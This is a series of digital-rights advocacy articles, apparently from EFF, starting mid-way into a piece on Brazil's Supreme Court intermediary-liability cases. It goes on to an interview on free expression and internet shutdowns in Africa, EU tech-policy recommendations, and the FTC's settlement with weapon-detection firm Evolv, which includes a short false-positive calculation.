Both cases went all the way to the Supreme Court in two separate extraordinary appeals, now examined jointly. For the Supreme Court to analyze extraordinary appeals, it must identify and approve a "general repercussion" issue that unfolds from the individual case. As such, the topics under analysis by the Brazilian Supreme Court in these appeals are not only the individual cases, but also the court's understanding of the general repercussion issues involved.
What the court stipulates in this regard will orient lower courts' decisions in similar cases.

The two general repercussion issues under scrutiny are, then, the constitutionality of Marco Civil's internet intermediary liability regime, and whether internet application providers have an obligation to monitor published content and take it down when considered offensive, without judicial intervention.

There's a lot at stake for users' rights online in the outcomes of these cases.

The Many Perils and Pitfalls on the Way

Brazil's platform regulation debate has heated up in the last few years. Concerns over the gigantic power of Big Tech platforms, the negative effects of their attention-driven business model, and revelations of plans and actions by the previous presidential administration to remain in power arbitrarily have inflamed discussions of regulating Big Tech. As its main vector, draft bill 2630 (PL 2630), didn't move forward in the Brazilian Congress, the Supreme Court's pending cases gained traction as the available alternative for introducing changes.

We've written about intermediary liability trends around the globe, how to move forward, and the risk that changes to safe harbor regimes end up reshaping intermediaries' behavior in ways that ultimately harm freedom of expression and other rights of internet users.

One of these risks is relying on strict liability regimes to moderate user expression online. Holding internet application providers liable for user-generated content regardless of a notification means requiring them to put in place systems of content monitoring and filtering, with automated takedowns of potentially infringing content.

While platforms like Facebook, Instagram, X (formerly Twitter), TikTok, and YouTube already use AI tools to moderate and curate the sheer volume of content they receive per minute, the resources they have for doing so are not available to other, smaller internet application providers that host users' expression. Making automated content monitoring a general obligation will likely intensify the concentration of the online ecosystem in just a handful of large platforms. Strict liability regimes also inhibit or even endanger the existence of less-centralized content moderation models, contributing yet again to entrenching Big Tech's dominance and business model.

But the fact that Big Tech platforms already use AI tools to moderate and restrict content doesn't mean they do it well. Automated content monitoring is hard at scale, and platforms constantly fail at purging content that violates their rules without sweeping up protected content. In addition to historical issues with AI-based detection of copyright infringement that have deeply undermined fair use rules, automated systems often flag and censor crucial information that should stay online.

Just to give a few examples: during the wave of protests in Chile, internet platforms wrongfully restricted content reporting the police's harsh repression of demonstrations, having deemed it violent content. In Brazil, we saw similar concerns when Instagram censored images of the massacre in the Jacarezinho community in 2021, the most lethal police operation in Rio de Janeiro's history. In other geographies, the quest to restrict extremist content has removed videos documenting human rights violations in conflicts in countries like Syria and Ukraine.
These are all examples of content similar to what could fit into Justice Toffoli's list of speech subject to a strict liability regime. And while that regime shouldn't apply in cases of reasonable doubt, platform companies won't likely risk keeping such content up out of concern that a judge later decides it wasn't a reasonable-doubt situation and orders them to pay damages. Digital platforms have, then, a strong incentive to calibrate their AI systems to err on the side of censorship. And depending on how these systems operate, that means a strong incentive for prior censorship potentially affecting protected expression, which defies Article 13 of the American Convention.

Setting the notice-and-takedown regime as the general rule for intermediary liability also poses risks. While the company has the chance to analyze and decide whether to keep content online, again the incentive is to err on the side of taking it down to avoid legal costs.

Brazil's own experience in the courts shows how tricky the issue can be. InternetLab's research, based on rulings involving free expression online, indicated that Brazilian courts of appeals denied content removal requests in more than 60% of cases. The Brazilian Association of Investigative Journalism (ABRAJI) has also highlighted data showing that at some point in judicial proceedings, judges agreed with content removal requests in around half of the cases, and some of those decisions were reversed later on. This is especially concerning in honor-related cases. The more influential or powerful the person involved, the higher the chances of arbitrary content removal, flipping the public-interest logic of preserving access to information. We should not forget the companies that thrived by offering reputation management services built on the use of takedown mechanisms to disappear critical content online.

It's important to underline that this ruling comes in the absence of digital procedural justice guarantees. While Justice Toffoli's vote asserts platforms' duty to provide specific notification channels, preferably electronic, to receive complaints about infringing content, there are no further specifications to avoid the misuse of notification systems. Article 21 of Marco Civil sets out that notices must allow the specific identification of the contested content (generally understood as the URL) and include elements to verify that the complainant is the person offended. Except for that, there is no further guidance on which details and justifications the notice should contain, or whether the content's author would have the opportunity, and a proper mechanism, to respond or appeal the takedown request.

As we said before, we should not confuse platform accountability with reinforcing digital platforms as points of control over people's online expression and actions. This is a dangerous path considering the power big platforms already have and the increasing intermediation of digital technologies in everything we do. Unfortunately, the Supreme Court seems to be taking a direction that will emphasize such a role and dominant position, also creating additional hurdles for smaller platforms and decentralized models to compete with the current digital giants.

The promise of the internet—at least in the early days—was that it would lower the barriers to entry for any number of careers.
Traditionally, the spheres of novel writing, culture criticism, and journalism were populated by well-off straight white men, with anyone not meeting one of those criteria being an outlier. Add in giant corporations acting as gatekeepers to those spheres, and it was a very homogenous culture. The internet has changed that. There is a lot about the internet that needs fixing, but the one thing we should preserve and nurture is the nontraditional paths to success it creates. In this series of interviews, called "Gate Crashing," we look to highlight those people and learn from their examples. In an ideal world, lawmakers will be guided by lived experiences like these when thinking about new internet legislation or policy. In our first video, we look at creators who honed their media criticism skills in fandom spaces. Please join Gavia Baker-Whitelaw and Elizabeth Minkel, co-creators of the Rec Center newsletter, in a wide-ranging discussion about how they got started, where it has led them, and what they've learned about internet culture and policy along the way.

[Embedded YouTube video: https://www.youtube.com/embed/aeplIxvskx8]

Interviewer: David Greene

*This interview has been edited for length and clarity.

Tomiwa Ilori is an expert researcher and a policy analyst with a focus on digital technologies and human rights. Currently, he is an advisor for the B-Tech Africa Project at UN Human Rights and a Senior ICFP Fellow at HURIDOCS. His postgraduate qualifications include master's and doctorate degrees from the Centre for Human Rights, Faculty of Law, University of Pretoria. All views and opinions expressed in this interview are personal.

Greene: Why don't you start by introducing yourself?

Tomiwa Ilori: My name is Tomiwa Ilori. I'm a legal consultant with expertise in digital rights and policy. I work with a lot of organizations on digital rights and policy, including information rights, business and human rights, platform governance, surveillance studies, data protection, and other areas.

Greene: Can you tell us more about the B-Tech project?

The B-Tech project is a project by the UN human rights office, and the idea behind it is to mainstream the UN Guiding Principles on Business and Human Rights (UNGPs) into the tech sector. The project looks at, for example, how social media platforms can apply human rights due diligence frameworks or processes to their products and services more effectively. We also work on topical issues such as Generative AI and its impacts on human rights. For example, how do the UNGPs apply to Generative AI? What guidance can the UNGPs provide for its regulation, and what can actors and policymakers look for when regulating Generative AI and other new and emerging technologies?

Greene: Great. This series is about freedom of expression. So my first question for you is: what does freedom of expression mean to you personally?

I think freedom of expression is like oxygen, more or less like the air we breathe. There is nothing about being human that doesn't involve expression, just like drawing breath.
Even beyond just being a right, it's an intrinsic part of being human. It's embedded in us from the start. You have this natural urge to want to express yourself right from infancy. So beyond being a human right, it is something you can almost not do without in every facet of life. Just to put it as simply as possible, that's what it means to me.

Greene: Is there a single experience, or several experiences, that shaped your views about freedom of expression?

Yes. For context, I'm Nigerian and I grew up in the Southwestern part of the country, where most of the Yorùbá people live. As a Yorùbá person and as someone who grew up listening to and speaking the Yorùbá language, language has a huge influence on me, my philosophy, and my ideas. I have a mother who loves to speak in proverbs, mostly in Yorùbá. Most of these proverbs, which are usually profound, show that free speech is the cornerstone of being human, being part of a community, and exercising your right to life and existence. Sharing expression and growing up in that kind of community shaped my worldview about my right to be. Closely attached to my right to be is my right to express myself. More importantly, it also shaped my view about how my right to be does not necessarily interrupt someone else's right to be. So, yes, my background and how I grew up really shaped me. Then I was fortunate to further my studies: my graduate studies, including my doctorate, focused on freedom of expression. So I got both the legal and the traditional background, grounded in free speech studies and practices in unique and diverse ways.

Greene: Can you talk more about whether there is something about the Yorùbá language or culture that is uniquely supportive of freedom of expression?

There's a proverb that goes, "A kìí pa ohùn mọ agogo lẹ́nu," and what that means in a loose English translation is that you cannot shut the clapperless bell up; it is the bell's right to speak, to make a sound. You have no right to stop a bell from doing what it's meant to do, which suggests that it is everyone's right to express themselves. It suffices to say that, according to that proverb, you have no right to stop people from expressing themselves. There's another, somewhat similar proverb, "Ọmọdé gbọ́n, àgbà gbọ́n, lafí dá ótù Ifẹ̀," which, loosely translated, refers to how both the old and the young collaborate to make the most of a society by expressing their wisdom.

Greene: Have you ever had a personal experience with censorship?

Yes, and I will talk about two experiences. First, and this might not fit the technical definition of censorship, but there was a time when I lived in Kampala and had to pay a tax to access the internet, which I think is prohibitive for those who are unable to pay it. If people have to make a choice between buying bread to eat and paying a tax to access the internet, especially when one item is an opportunity cost of the other, it makes sense that someone would choose bread over paying that tax. So you could say it's a way of censoring internet users. When you make access prohibitive through taxation, it is also a way of censoring people.
Even though I was able to pay the tax, I could not stop thinking about those who were unable to afford it, and for me that is problematic and qualifies as a kind of censorship.

The other experience was actually very recent. Even though the internet service provider insisted that it did not shut down or throttle the internet, I remember that during the recent protests in Nairobi, Kenya in June of 2024, I experienced an internet shutdown for the first time. According to the internet service provider, the shutdown was the result of an undersea cable cut. Suddenly my emails just stopped working and my Twitter (now X) feed wouldn't load. The connection would work for a few seconds, then all of a sudden stop, then work for some time, then nothing. I felt incapacitated and helpless. That's the way I would describe it. I felt like, "Wow, I have written, thought, and spoken about this so many times, and this is it." For the first time I understood what it means to actually experience an internet shutdown, and it's not just the experience, it's the helplessness that comes with it too.

Greene: Do you think there is ever a time when the government can justify an internet shutdown?

The simple answer is no. In my view, those who carry out internet shutdowns, especially state actors, believe that since freedom of expression and some other associated rights are not absolute, they have every right to restrict them without measure. I think what many actors involved in internet shutdowns use as justification is a mask for their limited capacity to do the right thing. Actors involved in shutting down the internet say they usually do not have a choice. For example, they say that hate speech, misinformation, and online violence are being spread online in such a way that they could spill over into offline violence. Some have even gone as far as saying that they're shutting down the internet because they want to curtail examination fraud. When these are the kinds of excuses used, it demonstrates these actors' limited understanding of what international human rights standards prescribe and of what can actually be done to address the online harms that are used to justify internet shutdowns.

Let me use an example: international human rights standards provide clear processes for instances where state actors must address online harms, or where private actors must address harms, to forestall offline violence. The perception is that these standards do not even give room for addressing harms, which is not the case. The process requires that whatever action you take must be legal, i.e. provided for clearly in a law that is not vague, and it must be unequivocal and show in detail the nature of the right being limited. Another requirement says that whatever action is taken to limit a right must be proportionate. If you are trying to fight hate speech online, isn't it disproportionate to shut down the entire network just to fight one section of people spreading such speech? Another requirement is that the action's necessity must be justified, i.e. it must protect a clearly defined public interest or order, which must be specific and not the blanket term "national security." Additionally, international human rights law is clear that these requirements are cumulative, i.e.
you cannot fulfill the requirement of legality and not fulfill that of proportionality or necessity.

This shows that regulation of online harms needs to be very specific. So, for example, state actors can claim that a particular piece of content or speech is causing harm, which they must prove according to the requirements above, and then make a request such that just that content alone is restricted. All of this must also be put in context. Take hate speech as an example: there is the Rabat Plan of Action, which was developed by the UN, and it is very clear on the conditions that must be met before speech can be categorized as hate speech. So, are these conditions met by state actors before, for example, they ask platforms to remove particular hateful content? There are steps and processes involved in the regulation of problematic content, but state actors rarely go for targeted removals that comply with international human rights standards; they usually go for the entire network.

I would also add that I find it problematic and ironic that most state actors who are supposedly champions of digital transformation are also the ones quick to shut down the internet during political events. There is no digital transformation that does not include a free, accessible, and interoperable internet. These are some of the challenges and problematic issues that I think we need to address in more detail so we can hear each other better, especially when it comes to regulating online speech and fighting internet shutdowns.

Greene: So shutdowns are then inherently disproportionate and not authorized by law. You talked about the types of speech that might be limited. Can you give us a sense of what types of online speech you think might be appropriately regulated by governments?

Among the categories of speech that can be regulated is, of course, hate speech. It is addressed under international law: Article 20 of the International Covenant on Civil and Political Rights (ICCPR) prohibits propaganda for war and advocacy of hatred, and the International Convention on the Elimination of All Forms of Racial Discrimination (ICERD) also provides for this. However, these provisions are not carte blanche for state actors. The major conditions that must be met before speech qualifies as hate speech must be fulfilled before it can be regarded as such. This is done in order to address instances where powerful actors define what constitutes hate speech and violate human rights under the guise of combating it. There are still laws that criminalize disaffection against the state, and they are used to prosecute dissent.

Greene: In Nigeria or in Kenya, or just on the continent in general?

Yes, there are countries that still have lèse-majesté laws in their criminal laws and penal codes. We've had countries like Nigeria that tried to come up with a version of such laws for the online space, but these were fought down, mostly by civil society actors.

So hate speech does qualify as speech that could be limited, but with caveats. There are several conditions that must be met before speech qualifies as hate speech. There must be context around the speech. For example, what kind of power does the person who makes the speech wield? What is the likelihood of that speech leading to violence? To what audience has the speech been made?
These are some of the criteria that must be fulfilled before you say, "okay, this qualifies as hate speech."

There is also other clearly problematic content, child sexual abuse material for example, that is prima facie illegal and must be censored, removed, or disallowed. That goes without saying; it's customary international human rights law, especially as it applies to platform governance. Another category could be the non-consensual sharing of intimate images, which could qualify as online gender-based violence. So these are some of the categories that could come under regulation by states.

I must also sound a note of caution that there are contexts to applying speech laws. That is the reason speech laws are among the most difficult regulations to come up with: they are usually context-dependent, especially when they have to be balanced against international human rights standards. Of course, some of the biggest fears in platform regulation that touch on freedom of expression are how state actors could weaponize those laws to track or attack dissent, and how businesses platform speech mainly for profit.

Greene: Is misinformation something the government should have a role in regulating, or is that something that needs to be regulated by the companies or by the speakers? If it's something we need to worry about, who has a role in regulating it?

State actors have a role. But in my opinion that role isn't regulation. The fact that you have a hammer does not mean that everything must look like a nail. The fact that a state actor has the power to make laws does not mean that it must always make laws on all social problems. I believe non-legal and multi-stakeholder solutions are required for combating online harms. State actors have tried to do what they do best by coming up with laws that regulate misinformation. But where has that led us? The arrest and harassment of journalists, human rights defenders, and activists. So it has really not solved any problems.

When your approach is not solving any problems, I think it's only right to re-evaluate. That's the reason I said state actors have a role. In my view, state actors need to step back, in the sense that you don't necessarily need to leave the scene, but step back and allow for a more holistic dialogue among the stakeholders involved in the information ecosystem. You could achieve a whole lot more through digital literacy and skills than you will by criminalizing misinformation. You can do far more by supporting journalists with fact-checking skills than you will ever achieve by passing overbroad laws that limit access to information. You can do more by working with stakeholders in the information ecosystem, like platforms, to label problematic content than you ever will by shutting down the internet. These are some of the non-legal methods that could be used to combat misinformation and actually get results. So state actors have a role, but it is mainly facilitatory, in the sense that they should bring stakeholders together to brainstorm on what the contexts are and the kinds of solutions that could be applied effectively.

Greene: What do you feel the role of the companies should be?

Companies also have an important role, one of which is to respect human rights in the course of providing services.
What I always say about technology companies is that if a certain jurisdiction or context is good enough to make money from, it is good enough to pay attention to and respect human rights there.

One of the perennial issues platforms face in addressing online harms is aligning their community standards with international human rights standards. But oftentimes corporate-speak is louder than the human rights language in many of these standards.

That said, one of the practical things platforms could do is step out of the corporate talk of, "Oh, we're companies, there's not much we can do." There's a lot they can do. Companies need to get more involved, step into the arena, and work with key state actors, including civil society, to educate and develop capacity on how their platforms actually work. For example, what are the processes involved in taking down a piece of content? What are the processes involved in appeals? What are the processes involved in actually getting redress when a piece of content has been wrongly taken down? What are the ways platforms can accurately—and I say accurately emphatically, because I'm not speaking about using automated tools—label content? Platforms also have a responsibility to be fully invested in the contexts they do business in. What are the triggers for misinformation in a particular country? Elections, conflict, protests? These are early-warning signs that platforms need to start paying attention to in order to understand their contexts and address the harms on their platforms better.

Greene: What's the most pressing free speech issue in the region in which you work?

Well, for me, a few key issues come to mind. Number one, which has been going on for the longest time, is governments' use of laws to stifle free speech. Most of the laws used are cybercrime laws, electronic communication laws, and old press codes and criminal codes. They were never justified, and they're still not justified.

A second issue is the privatization of speech by companies, regarding the kind of speech that gets promoted or demoted. What are the guidelines on, for example, political advertisements? What are the guidelines on targeted advertising? How is people's data curated? What is it like inside the algorithmic black box? Platforms' role in who says what, how, when, and where is also a burning free speech issue. And we are moving towards a future where speech is being commodified and privatized. Public media, for example, are now being relegated to the background. Everyone wants to be on social media, and I'm not saying that's a terrible thing, but it gives us a lot to think about, a lot to chew on.

Greene: And finally, who is your free speech hero?

His name is Felá Aníkúlápó Kútì. Fela was a political musician and the originator of Afrobeat (not afrobeats with an "s," but the original Afrobeat from which that one came). Fela never started out as a political musician, but his music became highly political and highly popular among the people, for obvious reasons. His music was also timely: as a political musician in Nigeria who lived through the brutal military era, he resonated with a lot of people. He was a huge thorn in the flesh of despotic Nigerian and African leaders.
So, for me, Fela is my free speech hero. He said quite a lot with his music that many people in his generation would never dare to say because of the political climate at that time. Taking such risks even in the face of brazen violence, and even death, was remarkable.

Fela was not just a political musician who understood the power of expression; he was also someone who understood the power of visual expression. He was unique in his own way and expressed himself through music, through his lyrics. He has inspired a lot of people, including musicians, politicians, and a lot of new-generation activists.

The European Union (EU) is a hotbed for tech regulation that often has ramifications for users globally. The focus of our work in Europe is to ensure that EU tech policy is made responsibly and lives up to its potential to protect users everywhere.

As the new mandate of the European institutions begins – a period when newly elected policymakers set legislative priorities for the coming years – EFF today published recommendations for a European tech policy agenda that centers on fundamental rights, empowers users, and fosters fair competition. These principles will guide our work in the EU over the next five years. Building on our previous work and successes in the EU, we will continue to advocate for users and work to ensure that technology supports freedom, justice, and innovation for all people of the world.

Our policy recommendations cover social media platform intermediary liability, competition and interoperability, consumer protection, privacy and surveillance, and AI regulation. Here's a sneak peek:

The EU must ensure that the enforcement of platform regulation laws like the Digital Services Act and the European Media Freedom Act is centered on the fundamental rights of users in the EU and beyond.

The EU must create the conditions for fair digital markets that foster choice, innovation, and fundamental rights. Achieving this requires enforcing the user-rights-centered provisions of the Digital Markets Act, promoting app store freedom, user choice, and interoperability, and countering AI monopolies.

The EU must adopt a privacy-first approach to fighting online harms like targeted ads and deceptive design, and protect children online without reverting to harmful age verification methods that undermine the fundamental rights of all users.

The EU must protect users' rights to secure, encrypted, and private communication, protect against surveillance everywhere, steer clear of new data retention mandates, and prioritize the rights-respecting enforcement of the AI Act.

Read on for our full set of recommendations.

The Federal Trade Commission has entered into a settlement with self-styled "weapon detection" company Evolv to resolve the FTC's claim that the company "knowingly" and "repeatedly" engaged in "unlawful" acts by making misleading claims about its technology.
Essentially, Evolv's technology, which is deployed in schools, subways, and stadiums, does far less than the company has been claiming.

The FTC alleged in its complaint that, despite Evolv's lofty claims, the technology is fundamentally no different from a metal detector: "The company has insisted publicly and repeatedly that Express is a 'weapons detection' system and not a 'metal detector.' This representation is solely a marketing distinction, in that the only things that Express scanners detect are metallic and its alarms can be set off by metallic objects that are not weapons." A typical contract for Evolv costs tens of thousands of dollars per year—five times the cost of traditional metal detectors. One district in Kentucky spent $17 million to outfit its schools with the technology.

The settlement requires Evolv to notify the many schools that use this technology to keep weapons out of classrooms that they are allowed to cancel their contracts. It also blocks the company from making any representations about its technology's:

ability to detect weapons
ability to ignore harmless personal items
ability to detect weapons while ignoring harmless personal items
ability to ignore harmless personal items without requiring visitors to remove any such items from pockets or bags

The company is also prohibited from making statements regarding:

Weapons detection accuracy, including in comparison to the use of metal detectors
False alarm rates, including comparisons to the use of metal detectors
The speed at which visitors can be screened, as compared to the use of metal detectors
Labor costs, including comparisons to the use of metal detectors
Testing, or the results of any testing
Any material aspect of its performance, efficacy, nature, or central characteristics, including, but not limited to, the use of algorithms, artificial intelligence, or other automated systems or tools

If the company can't say these things anymore, then what do they even have left to sell?

There's a reason so many people accuse artificial intelligence of being "snake oil." Time and again, a company takes public money in order to power "AI" surveillance, only for taxpayers to learn it does no such thing. "Just walk out" stores actually required people watching you on camera to determine what you purchased. Gunshot detection software that relies on a combination of artificial intelligence and human "acoustic experts" to purportedly identify and locate gunshots "rarely produces evidence of a gun-related crime." There's a lot of well-justified suspicion about what's really going on inside the black box of corporate secrecy in which artificial intelligence so often operates.

Even when artificial intelligence used by the government isn't "snake oil," it often does more harm than good. AI systems can introduce or exacerbate harmful biases that have massive negative impacts on people's lives. AI systems have been implicated in falsely accusing people of welfare fraud, increasing racial bias in jail sentencing as well as in policing and crime prediction, and falsely identifying people as suspects based on facial recognition.

Now the politicians, schools, police departments, and private venues have been duped again.
This time, by Evolv, a company that purports to sell "weapon detection" technology, which it claimed would use AI to scan people entering a stadium, school, or museum and, theoretically, alert authorities if it recognized the shape of a weapon on a person.

Even before the new FTC action, there were indications that this technology was not an effective solution to weapon-based violence. From July to October, New York City ran a trial of Evolv technology at 20 subway stations in an attempt to keep people from bringing weapons onto the transit system. Out of 2,749 scans, there were 118 false positives. Twelve knives and no guns were recovered.

Make no mistake, false positives are dangerous. Falsely telling officers to expect an armed individual is a recipe for an unarmed person to be injured or even killed.

Cities, performance venues, schools, and transit systems are understandably eager to do something about violence, but throwing money at the problem by buying unproven technology is not the answer; it actually takes resources and funding away from more proven and systematic approaches. We applaud the FTC for standing up to the lucrative security theater technology industry.
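To put the subway pilot figures above in perspective, here is a minimal back-of-envelope sketch in Python. It assumes, purely for illustration, that each recovered knife corresponded to a genuine alert; the reported numbers do not break out total alerts, and the variable names are ours, not the pilot's.

```python
# Back-of-envelope rates from the reported NYC subway pilot figures.
scans = 2749            # total scans reported in the pilot
false_positives = 118   # alerts where no weapon was found
knives = 12             # knives recovered (assumed, for illustration, to map 1:1 to genuine alerts)

alerts = false_positives + knives  # presumed total alerts: 130

print(f"False alarms per scan:  {false_positives / scans:.1%}")   # ~4.3%
print(f"False alarms per alert: {false_positives / alerts:.1%}")  # ~90.8%
```

On those assumptions, roughly nine out of every ten alerts were false alarms, which is why the false positive numbers, not the handful of recovered knives, dominate any honest reading of the pilot.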